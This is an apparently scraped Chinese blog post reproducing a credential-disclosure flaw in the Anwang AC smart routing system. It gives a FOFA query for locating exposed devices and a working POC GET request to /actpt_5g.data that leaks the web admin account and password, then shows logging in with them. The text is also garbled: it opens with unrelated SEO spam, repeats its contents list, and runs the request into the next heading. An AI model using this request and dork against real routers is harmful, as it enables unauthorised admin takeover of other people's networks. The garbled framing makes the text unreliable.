长沙网站建设价格,网站会员收费怎么做,自己在线制作图片免费下载,企业官网运营文章目录 安网AC智能路由系统actpt_5g.data敏感信息泄露漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 安网AC智能路由系统actpt_5g.data敏感信息泄露漏洞复现 [附POC]
0x01 前言
免责声明#xff1a;请勿利… 文章目录 安网AC智能路由系统actpt_5g.data敏感信息泄露漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 安网AC智能路由系统actpt_5g.data敏感信息泄露漏洞复现 [附POC]
0x01 前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用
0x02 漏洞描述
AC 集中管理平台能集中管理控制瘦 AP 设备对AP 实现了智能化高效控制。AC 中的数据能下发到 AP 设备中AP 设备中的参数也能同步到 AC 集中管理平台。
安网智能AC管理系统actpt_5g.data存在信息漏洞攻击者可利用该漏洞获取敏感信息。攻击者可利用该漏洞获取AC智能路由系统WEB登录账号密码登录AC智能路由系统获取WEB管理员权限从而造成敏感信息泄露。
0x03 影响版本
安网AC智能路由系统0x04 漏洞环境
FOFA语法title“安网-智能路由系统” || header“HTTPD_ac 1.0”
0x05 漏洞复现
1.访问漏洞环境 2.构造POC
POC GET
GET /actpt_5g.data HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 03.复现
1.执行poc查询账号密码得到结果并登录 2.使用显示的用户名以及密码登录系统